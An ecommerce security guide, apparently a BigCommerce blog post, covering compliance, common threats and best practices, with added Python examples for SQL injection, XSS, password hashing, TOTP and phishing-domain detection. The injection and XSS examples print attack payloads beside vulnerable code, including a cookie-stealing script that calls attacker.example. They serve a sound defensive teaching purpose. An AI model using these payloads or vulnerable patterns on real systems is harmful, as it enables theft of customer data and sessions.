What You Need to Know About Securing Your Ecommerce Site Against Cyber Threats
Ecommerce sites will always be a hot target for cyberattacks. For would-be thieves, they are treasure troves of personal and financial data. And for businesses of all sizes, the cost of a breach, both in lost data and in lost customer trust, can be hugely damaging.
Ecommerce business owners are all too aware of these issues and are increasing their security measures. The VMware Carbon Black 2020 Cybersecurity Outlook Report found that 77% of businesses surveyed had purchased new security products in the last year and 69% had increased security staff.
In this constant game of cat and mouse, as online retailers add increasingly innovative technologies to their sites to stay competitive, attackers are honing their skills just as quickly and finding new vulnerabilities to exploit. The best way to stay ahead is to know the ecommerce security best practices and the types of attacks to be on the lookout for.
What is Ecommerce Security?
The frequency and sophistication of cyber attacks has skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
Let’s look at some terminology and common acronyms you should know:
Payment Card Industry Data Security Standard (PCI DSS).
PCI DSS (often referred to as just “PCI”) is an industry standard that sets requirements for how payment card data is stored, processed, and transmitted, whether it is collected online or in person.
International Organization for Standardization (ISO).
ISO is an international standard-setting body that publishes requirements to help businesses make sure their products and processes are fit for purpose. One of its standards, ISO/IEC 27001:2013, specifies the requirements for an information security management system (ISMS). Achieving certification means an accredited auditor has verified that the business runs a documented ISMS: it identifies and treats its information security risks, applies a standardized set of controls, and reviews them on a regular cycle.
Personal data.
Personal data or personal information refers to any data that can be linked back to a specific individual. Most simply, this includes names, email addresses, and phone numbers, but it can get more complex: any data set, even one scrubbed of names and numbers, that can still identify a particular person is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS.
TLS is the protocol that authenticates your web server to the shopper’s browser and encrypts the traffic between them; SSL is its deprecated predecessor, though the certificates are still commonly called “SSL certificates.” Once you have a certificate installed, you can move your store from HTTP to HTTPS (HTTP carried over TLS), which protects logins and checkout data in transit and serves as a trust signal to customers. Keep in mind that HTTPS secures the connection, not the site: a phishing page can be served over HTTPS too, so the padlock alone does not prove a site is legitimate.
Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV).
MFA, 2FA, and 2SV are sometimes used interchangeably, and they are similar, but there are differences among them. All three require at least one further proof of identity, beyond a username and password, from a user logging in to a site like your ecommerce store. Authentication factors are usually grouped into three kinds: something you know (a password or PIN), something you have (a phone, an authenticator app, or a hardware security key), and something you are (a fingerprint or face scan).
Here’s a high-level explanation of the differences:
- 2SV requires a second step, which may or may not be a different kind of factor: typically a one-time code delivered via email, text message, or phone call.
- 2FA requires two distinct kinds of factor, for example a password plus approving the login in an authenticator app on a separate mobile device while logging in from a laptop.
- MFA is the general term and covers any implementation with two or more distinct factors; every 2FA setup is a form of MFA.
Whichever you choose, codes delivered by SMS or email are the weakest option, since they can be intercepted through SIM-swap fraud or a compromised mailbox; an authenticator app or hardware key is stronger.
Distributed Denial of Service (DDoS).
A DDoS attack disrupts a server, service, or network by overwhelming it with a flood of traffic sent from many compromised machines at once. Cloudflare’s resource on DDoS attacks, which offers more detail, compares it to a traffic jam: your customers are cars trying to reach your store, and the attack traffic is a rush-hour flood of other cars clogging the road so that legitimate shoppers cannot get through. Because the traffic comes from thousands of sources, blocking a single address does not help; mitigation happens upstream, at a CDN or DDoS-scrubbing provider, rather than on the store server itself.
Malware and ransomware.
Malware, or “malicious software,” is any software designed to damage, disrupt, or gain unauthorized access to a system, usually installed without the owner’s knowledge through a phishing attachment, a malicious download, or an unpatched vulnerability. Ransomware is a type of malware that locks the victim out of their system, or encrypts their data, until a ransom is paid to the attacker. Here are a few symptoms you may experience if your system becomes infected:
- Links take you to the wrong page destination.
- New toolbars or buttons appear in your browser, or new icons show up on your desktop.
- You experience a near-constant barrage of ad pop-ups.
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive.
- Your emails keep bouncing.
What is Compliance, and How is it Different From Security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related. But there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. But meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. (Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.)
Payment Card Industry Data Security Standard (PCI DSS).
Any business that stores, processes, or transmits payment card data must comply with the PCI DSS requirements for protecting cardholder data, regardless of its revenue or transaction volume; what changes with volume is the level of validation required (a self-assessment questionnaire for smaller merchants, an on-site assessment by a Qualified Security Assessor for the largest). The standard is defined by the PCI Security Standards Council (PCI SSC) and enforced by the card brands through the banks that process your payments. Outsourcing checkout to a PCI-compliant payment provider shrinks the portion of the requirements that apply to you, but it does not remove your obligation entirely.
General Data Protection Regulation (GDPR).
GDPR is the European Union’s data protection law, in force since May 2018, which protects the personal data and privacy of individuals in the European Economic Area (EEA), not only EU citizens. And it does not apply only to businesses based in the EU: if you sell to people in the EEA, you must comply with GDPR when handling their data, wherever your business is located.
California Consumer Privacy Act (CCPA).
After GDPR was implemented in the EU, the state of California enacted its own data protection law. CCPA took effect on January 1, 2020, and applies to businesses above certain size or data-volume thresholds that collect the personal information of California residents, whether or not the business is located in California.
The spirit of CCPA is similar to GDPR in that it is dedicated to protecting the data and privacy of private individuals, but there are a few important differences. While this is the most recent and farthest-reaching data protection standard in the U.S., at least 15 other states have some type of personal privacy or data protection law.
The Biggest Security Threats to Your Ecommerce Site
The types and methods of cyber attack are broad and varied, and it would be almost impossible to delve into them all in one blog post. But there are some that rise to the top as the most important to know about for strong ecommerce security.
Phishing.
Phishing is a type of social engineering: attackers impersonate a trusted party, typically via email, text, or phone, to trick victims into providing private information like passwords, account numbers, or social security numbers, or into opening a malicious attachment or link.
BigCommerce Note: BigCommerce will never send you an email with a link to update your store or your login credentials. If you receive an email, phone call, or text from “BigCommerce” in which personal information is requested, contact customer support directly for validation.
Malware and ransomware.
When your device or network is infected with malware, or with ransomware, a type of malware that encrypts your data and demands payment for the key, you may be locked out of your most important data and systems. Downtime is expensive, but regular backups of your site data, kept where an infected machine cannot reach and overwrite them, keep this from being a devastating blow to your business. Not clicking suspicious links, not installing unknown software, and keeping systems patched all reduce the chance of infection in the first place.
SQL injection (SQLi).
You are at risk if any part of your ecommerce site builds SQL queries by pasting user input (a search term, a login form field, a URL parameter) directly into the query text. An attacker who can close the quoted value and append their own SQL can read, and often modify, any data the application’s database account can reach, including customer records and order history. The fix is parameterized queries (prepared statements), where the query text and the values are sent to the database separately so input is never interpreted as SQL; input validation is a useful second layer, not a substitute.
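The following script is an added example, not code from the original article or from BigCommerce, showing the vulnerable pattern beside the parameterized fix. The customer table and the three rows are constructed for illustration, and it uses Python’s built-in sqlite3 module so it runs offline; the same distinction applies to any SQL driver.

```python
import sqlite3

# Constructed sample data standing in for a store database (not real customers).
CUSTOMERS = [
    ("alice@example.com", "4242"),
    ("bob@example.com", "1881"),
    ("carol@example.com", "0005"),
]

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)")
    db.executemany("INSERT INTO customers (email, card_last4) VALUES (?, ?)", CUSTOMERS)
    return db

def lookup_vulnerable(db, email):
    """Builds the query by string concatenation, so the input becomes part of the SQL."""
    sql = "SELECT email, card_last4 FROM customers WHERE email = '" + email + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, email):
    """Sends the value separately from the query text; the driver never parses it as SQL."""
    sql = "SELECT email, card_last4 FROM customers WHERE email = ?"
    return db.execute(sql, (email,)).fetchall()

# Classic tautology payload: closes the quoted string and appends an always-true condition,
# so the resulting WHERE clause is  email = 'nobody@example.com' OR '1'='1'
PAYLOAD = "nobody@example.com' OR '1'='1"

def demo():
    db = build_db()
    return {
        "vulnerable": lookup_vulnerable(db, PAYLOAD),        # every row comes back
        "parameterized": lookup_parameterized(db, PAYLOAD),  # no row has this literal email
        "normal": lookup_parameterized(db, "bob@example.com"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the payload, the concatenated query returns every customer and their card digits, while the parameterized query returns nothing because no row’s email literally equals the payload string. Note that sqlite3 refuses to run more than one statement per call, so a stacked `'; DROP TABLE ...` payload would fail here but may well succeed on other database drivers.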
Cross-site scripting (XSS).
Cross-site scripting is an injection flaw on the browser side: an attacker gets their own JavaScript to run in a shopper’s browser in the context of your site, for example by placing it in a product review, in a search query that is reflected back on the results page, or in a crafted link. The script can then read session cookies and form input, alter the page, or redirect the shopper. The defense is to encode every piece of user-supplied data for the HTML context it is rendered in, to mark session cookies HttpOnly, and to deploy a Content Security Policy that restricts where scripts may load from.
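As an added example (not from the original article), the script below renders a product review two ways: with raw interpolation, and with each value encoded for its context. The review payloads are constructed for illustration; the rendering functions and `safe_href` helper are this example’s own, standing in for whatever template layer a real store uses.

```python
import html
from urllib.parse import urlsplit

def render_review_vulnerable(author, body, profile_url):
    """Interpolates user-supplied values straight into the markup."""
    return (
        f'<div class="review" data-author="{author}">'
        f'<a href="{profile_url}">{author}</a><p>{body}</p></div>'
    )

def safe_href(url):
    """Escaping alone does not neutralize a javascript: URL in href, so allow only http(s)."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)

def render_review_escaped(author, body, profile_url):
    """Encodes each value for the context it lands in: quoted attribute, element text, URL."""
    return (
        f'<div class="review" data-author="{html.escape(author, quote=True)}">'
        f'<a href="{safe_href(profile_url)}">{html.escape(author)}</a>'
        f'<p>{html.escape(body)}</p></div>'
    )

# Constructed payloads of the kind a malicious reviewer would submit.
AUTHOR_PAYLOAD = '" onmouseover="alert(1)'                     # breaks out of the attribute
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
URL_PAYLOAD = "javascript:alert(document.cookie)"              # survives HTML escaping untouched

def demo():
    return {
        "vulnerable": render_review_vulnerable(AUTHOR_PAYLOAD, BODY_PAYLOAD, URL_PAYLOAD),
        "escaped": render_review_escaped(AUTHOR_PAYLOAD, BODY_PAYLOAD, URL_PAYLOAD),
    }

if __name__ == "__main__":
    for name, markup in demo().items():
        print(f"{name}:\n  {markup}")
```

Three contexts, three different failures: the author field escapes the quoted attribute and adds an event handler, the body injects a script element, and the profile URL is a `javascript:` link that HTML-escaping leaves fully functional, which is why URLs need scheme validation rather than just escaping.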
E-skimming.
E-skimming (also called Magecart, after the groups that popularized it) is the theft of card numbers and personal data from the checkout pages of ecommerce sites. Attackers first gain the ability to modify your page, whether through a successful phishing attempt, a brute-forced admin password, an XSS flaw, or a compromise of a third-party script your checkout loads, then plant JavaScript that copies whatever shoppers type into the payment form to a server the attacker controls, in real time and without interrupting the purchase. Because the skimmer often arrives through a trusted third-party script, keep an inventory of every script loaded on the checkout page, pin third-party scripts with Subresource Integrity where possible, and restrict script sources with a Content Security Policy.
Best Practices for Ecommerce Security
The compliance standards mentioned above aren’t going away. In fact, trends in privacy concerns indicate that we should expect more regulations in the future as people of all ages are increasingly concerned with where their data is going.
Verizon’s Data Breach Investigations Report dives deeper into trends in retail cyber attacks. Payment information is the most common target, and attacks on ecommerce sites continue to rise while point-of-sale breaches and physical card skimmers are, overall, declining.
If a security breach of your ecommerce site leads to a loss of customer data, the associated fines — and hit to your brand reputation — could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too.
According to the 2020 Verizon Data Breach Investigations Report, 37% of breaches involved the use of stolen or weak credentials. It’s worth the extra effort to make sure you, your employees, and your customers follow good password practices:
- Strong passwords are at least eight characters and mix upper and lowercase letters, numbers, and symbols. Length matters more than forced character classes: current NIST guidance (SP 800-63B) favors longer passphrases screened against lists of known-breached passwords over mandatory composition rules, which mostly produce predictable patterns like “Password1!”.
- Passwords should never be shared; each user should have their own unique, private username and password for login.
- Never reuse the password for your ecommerce site on any other account; credential-stuffing attacks replay passwords leaked from one site against many others.
- Consider using a password manager.
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions.
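The password advice above has two halves a store has to implement: rejecting weak passwords at sign-up, and storing the accepted ones so a database leak does not hand them to the attacker. The script below is an added example, not code from the original article or from BigCommerce; the breached-password list is a constructed stand-in for a real corpus, and the twelve-character minimum is this example’s own policy choice.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a breached-password corpus. In production, screen against a
# large list such as the Have I Been Pwned "Pwned Passwords" data set, not this handful.
BREACHED = {"password", "123456", "qwerty", "letmein", "welcome1", "password1!"}

MIN_LENGTH = 12  # length matters more than forced character classes

def password_problems(password, username=""):
    """Returns a list of reasons a password is unacceptable; empty means it passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() in BREACHED:
        problems.append("appears in breached-password list")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    if len(set(password)) <= 3:
        problems.append("too repetitive (three or fewer distinct characters)")
    return problems

def hash_password(password, salt=None):
    """scrypt (memory-hard) with a fresh random salt; the parameters travel with the hash
    so they can be raised later without breaking existing records."""
    salt = os.urandom(16) if salt is None else salt
    n, r, p = 2 ** 14, 8, 1
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p,
                            maxmem=2 ** 26, dklen=32)
    return f"scrypt${n}${r}${p}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    """Recomputes with the stored parameters and compares in constant time."""
    try:
        algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(
        password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
        n=int(n), r=int(r), p=int(p), maxmem=2 ** 26, dklen=len(digest_hex) // 2,
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))

if __name__ == "__main__":
    for candidate in ("Password1!", "correct horse battery staple"):
        print(candidate, "->", password_problems(candidate) or "ok")
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
```

“Password1!” satisfies every composition rule in the list above and is still rejected, because it is on the breached list and too short; a long passphrase with no symbols passes. The stored record carries algorithm, cost parameters, and salt, and verification uses a constant-time comparison so a timing difference cannot leak how much of a hash matched.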
“Do not use any form of the default admin name provided. Attackers write scripts that run day and night, trying over and over to log in to the admin panel; if you’ve used anything similar to ‘admin’, they are more likely to crack it.”
— Jason Simmons, CEO, Dead Soxy
Protect your devices.
Whether you have one computer in a home office or a headquarters with a fully networked system, make sure every connected device is protected with anti-virus software, a firewall, prompt operating-system updates, or another appropriate safeguard against threats.
Steel yourself against social engineering attempts.
One of the best ways to avoid malware infections is to avoid falling into phishing traps. Never provide personal information of any kind unless you have verified the identity of the recipient through a channel you already trust, such as a phone number from your own records rather than one given in the message. And no legitimate organization will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. And do not download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender.
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., BigCommerce.com could become BgCommerce.com).
- The same goes for any URLs you might click. At first glance, they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway to a dangerous domain.
- Suspicious emails may ask you to do something like transfer money or authorize a charge, and offer an excuse for why it must be done immediately.
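The lookalike-domain checks in the list above can be automated for a shared mailbox. The script below is an added example, not from the original article: it classifies the domain of a sender address against a constructed allowlist (the trusted domains and the sample headers are made up for illustration) using three heuristics, namely folding common character swaps, edit distance from a trusted domain, and a trusted brand appearing as a subdomain of someone else’s domain.

```python
import re
import unicodedata

# Constructed allowlist of domains this business legitimately receives mail from.
TRUSTED_DOMAINS = {"bigcommerce.com", "example-store.com"}

# Substitutions attackers use because the characters look alike in common fonts.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t"))

def normalize(domain):
    """Folds case, Unicode compatibility forms and common look-alike substitutions."""
    folded = unicodedata.normalize("NFKC", domain).lower()
    for fake, real in CONFUSABLES:
        folded = folded.replace(fake, real)
    return folded

def edit_distance(a, b):
    """Levenshtein distance: the number of single-character edits to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable_part(domain):
    """Last two labels, e.g. 'mail.bigcommerce.com' -> 'bigcommerce.com' (no public-suffix list here)."""
    labels = domain.split(".")
    return ".".join(labels[-2:])

def classify_sender(header_value):
    """Classifies a From: value as 'trusted', 'lookalike' or 'unknown' by its domain."""
    match = re.search(r"@([^\s@<>]+?)>?\s*$", header_value)
    if not match:
        return "unknown"
    domain = match.group(1).lower().rstrip(".")
    labels = domain.split(".")
    reg = registrable_part(domain)
    if reg in TRUSTED_DOMAINS:
        return "trusted"
    if any(label.startswith("xn--") for label in labels):
        return "lookalike"   # internationalized label: often a homoglyph attack, review by hand
    norm = normalize(reg)
    for trusted in TRUSTED_DOMAINS:
        if norm == trusted or edit_distance(norm, trusted) <= 2:
            return "lookalike"   # typo-squat or character swap
        if trusted.split(".")[0] in labels:
            return "lookalike"   # brand name used as a subdomain of a foreign domain
    return "unknown"

# Constructed From: header values of the kind an inbox would see.
SAMPLES = [
    "BigCommerce Billing <billing@bigcommerce.com>",
    "Support <support@bgcommerce.com>",
    "support@bigc0mmerce.com",
    "noreply@bigcornmerce.com",
    "help@bigcommerce.com.login-help.net",
    "Alice <alice@gmail.com>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{classify_sender(sample):9s}  {sample}")
```

This is a triage heuristic, not proof of anything: the From header itself can be forged outright, so a “trusted” result only means the displayed domain is yours, and whether the message really came from it is what SPF, DKIM, and DMARC checks on the receiving mail server establish. The edit-distance threshold of two will flag the occasional legitimate domain that happens to be close to yours, which is the right trade-off for a mailbox that handles payments.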
Implement additional authentication factors.
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you far more assurance that you and your authorized users are the only people logging into your store, because a stolen or guessed password alone is no longer enough. Prefer an authenticator app or a hardware security key over codes sent by SMS, which can be intercepted through SIM-swap fraud. Considering the potential consequences of a breach, it’s worth it.
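To make the “something you have” factor from the terminology section and the recommendation above concrete, here is the server side of a time-based one-time password (TOTP, RFC 6238) check, the scheme used by common authenticator apps. It is an added example, not code from the original article or from BigCommerce; the secret is the published RFC test secret rather than a real one, and the verifier class, its one-step drift window, and its replay rule are this example’s own design.

```python
import hashlib
import hmac
import struct
import time

def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"

def totp(secret, at, step=30, digits=6):
    """RFC 6238 TOTP: HOTP whose counter is the number of `step`-second intervals since the epoch."""
    return hotp(secret, int(at) // step, digits)

class TotpVerifier:
    """Server-side check that tolerates one step of clock drift and refuses replayed codes:
    once a code for counter c is accepted, nothing at counter <= c is accepted again."""

    def __init__(self, secret, step=30, digits=6, drift_steps=1):
        self.secret = secret
        self.step = step
        self.digits = digits
        self.drift_steps = drift_steps
        self.last_accepted_counter = -1

    def verify(self, submitted, now=None):
        now = time.time() if now is None else now
        counter = int(now) // self.step
        low = max(0, counter - self.drift_steps)
        for candidate in range(low, counter + self.drift_steps + 1):
            if candidate <= self.last_accepted_counter:
                continue
            expected = hotp(self.secret, candidate, self.digits)
            if hmac.compare_digest(expected, submitted):
                self.last_accepted_counter = candidate
                return True
        return False

# RFC 6238 test secret (the ASCII string "12345678901234567890"); a real secret is random,
# generated per user, and shared with their authenticator app once, usually as a QR code.
SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print("code right now:", totp(SECRET, time.time()))
    verifier = TotpVerifier(SECRET)
    print("first use:", verifier.verify("287082", now=59))   # RFC 6238 vector -> True
    print("replay:   ", verifier.verify("287082", now=59))   # same code again -> False
```

Two details matter in production beyond the arithmetic: the replay rule, since a phished code is only useful to the attacker if the server accepts it a second time, and rate limiting of attempts, because a six-digit code has only a million possibilities and an unthrottled endpoint can be brute-forced within the 30-second window plus drift.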
Only store the customer data that you need.
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. But in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business’ philosophy to balance customer experience, business convenience, and security.
“Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.”
— Shane Barker, ShaneBarker.com
Make sure your site is always up to date.
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform like BigCommerce, updates to your software are taken care of automatically. But with on-premises ecommerce solutions, your business is responsible for implementing any updates, bug fixes, or vulnerability patches to the software that powers your store.
“With our previous ecommerce platform, there were ongoing security updates that we had to manually install, which would always ‘break’ something else. We had to create a secondary sandbox site to test security updates prior to uploading to our live site. As you can imagine, this was not ideal.”
— Billy Thompson, President – Thompson Tee
Switch to HTTPS.
Secure HTTPS hosting, which requires a TLS certificate (still commonly called an SSL certificate), protects your shoppers’ logins and payment details from being read or altered in transit. It is also a boon for your marketing department: Google uses HTTPS as a ranking signal in organic search, and modern browsers label plain-HTTP pages as “Not secure.” Redirect every HTTP request to HTTPS and send an HTTP Strict-Transport-Security (HSTS) header so browsers never fall back to the unencrypted version. HTTPS sends a positive trust signal to your shoppers, particularly the digitally savvy.
Back up your data.
If you are breached and lose access to your data, you will want a backup to get your business running again as quickly as possible. Keep at least one copy offline or in storage that the live systems cannot write to, so that ransomware that encrypts your store cannot also encrypt the backup, and test a restore periodically; a backup you have never restored is an assumption, not a plan.
Regularly review all plugins and third-party integrations.
Take an inventory of all the third-party solutions running within your store, including the scripts they load on your pages. Make sure you know what each one is, what data and API permissions it holds, and whether you still trust that third party. If you are no longer using one, remove the integration and revoke its access. The goal is to allow the fewest parties access to your customers’ data while still driving your business forward.
Double Down on Security During the Holiday Season
The holiday season is, unfortunately, a time when you can expect higher volumes of attempted fraud and cybercrime. Everyone is busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behavior harder to detect. Attackers know this and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
Do a pre-holiday security check.
“The holiday season is the time when a good majority of ecommerce cyber-attacks take place, taking advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the holiday season starts. This should include checking for malware in point-of-sale systems and improving the security of web servers.”
— Shane Barker, ShaneBarker.com
Your holiday security audit should also include an examination of who has access to what:
“Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.”
— Jordan Brannon, President, Coalition Technologies
Increase your fraud protection.
A steep spike in shoppers is often accompanied by an increase in fraudulent activity. According to the TransUnion Holiday Retail Fraud Survey from 2019, 46% of customers are concerned about being the victim of fraud when shopping this holiday season.
“Another form of cyber risk and one of the biggest risks to ecommerce brands today is the chargeback scam. Attackers acquire credit card information along with credentials and go on a spending spree. The retailer gets an order and ships it without thinking twice, only to receive a chargeback at some point in the future because the charge was marked as fraud. The retailer can’t argue and is forced to refund the order, and the goods are long gone. This is compounded even more with loyalty programs and gift cards.
This type of cyber fraud is very hard to prevent. After losing thousands in merchandise we started using the Eye4fraud.com app for BigCommerce. The app tells us in real time if each order should be shipped or not and offers a guarantee for any chargeback.”
— Jason Simmons, CEO, Dead Soxy
Prepare your customer service team.
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
Have a security update plan.
It’s good advice to get your store locked down for the holidays and not make many changes to it, to avoid the extra risk that changes entail. But that guideline does not apply to security: a vulnerability still needs patching during the holiday freeze. This mostly concerns on-premises ecommerce solutions (BigCommerce merchants can breathe easy!), where you need a tried and tested plan for rolling out, and if necessary rolling back, an update so that a patch protects your business and your shoppers without taking the store down.
How BigCommerce Helps Secure Your Business
Each and every part of the BigCommerce platform is built with security in mind. Our multi-tenant SaaS ecommerce platform helps to lower your total cost of ownership; your organization is not responsible for maintaining servers, installing updates or patching the servers when security vulnerabilities are discovered.
The benefits of SaaS.
Best-in-class SaaS applications like BigCommerce provide robust layers of security along with rigorous fraud prevention, information security standards, and compliance frameworks. Updates and security patching are handled by the SaaS provider, taking some of the burden off its users.
With a move to Google Cloud Platform, BigCommerce’s security benefits have only increased, providing merchants with additional security measures including best-in-class protection against DDoS attacks.
In addition, BigCommerce maintains PCI compliance on behalf of merchants and holds ISO 27001 certification, the international standard outlining best practices for information security management systems.
“PCI requirements, complexity, and cost are increasing constantly. Mitigating this virtually requires a shift to SaaS.”
— Jason Greenwood, Director – Solutions & Delivery, Moustache Republic
Security and privacy by design.
BigCommerce takes both security and privacy very seriously, baking both into the way we build our products and interface with customers. We go a step further and put boundaries around how we interact with a merchant’s data.
Our merchants’ data and customers belong to them and only them. To keep your customers’ payment information as secure as possible, sensitive payment data is encrypted in transit and does not come to rest on BigCommerce’s infrastructure.
Developing good ecommerce security is vitally important to the success of your business. You can’t afford to lose your customers’ trust by exposing their personal data. By using a SaaS platform like BigCommerce, you get the benefits of spending more time growing your business — and less time worrying about security monitoring and maintenance.
But that doesn’t mean there’s nothing for you to do. Practicing good password hygiene, staying mindful about clicking links and downloading attachments from your email, and regularly reviewing your third-party integrations are particularly important, even for merchants on our secure SaaS platform.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.
Read more about security in SaaS with this technical deep dive.
This material does not constitute legal, tax, professional or financial advice and BigCommerce disclaims any liability with respect to this material. Please consult your attorney or professional advisor on specific legal, professional or financial matters.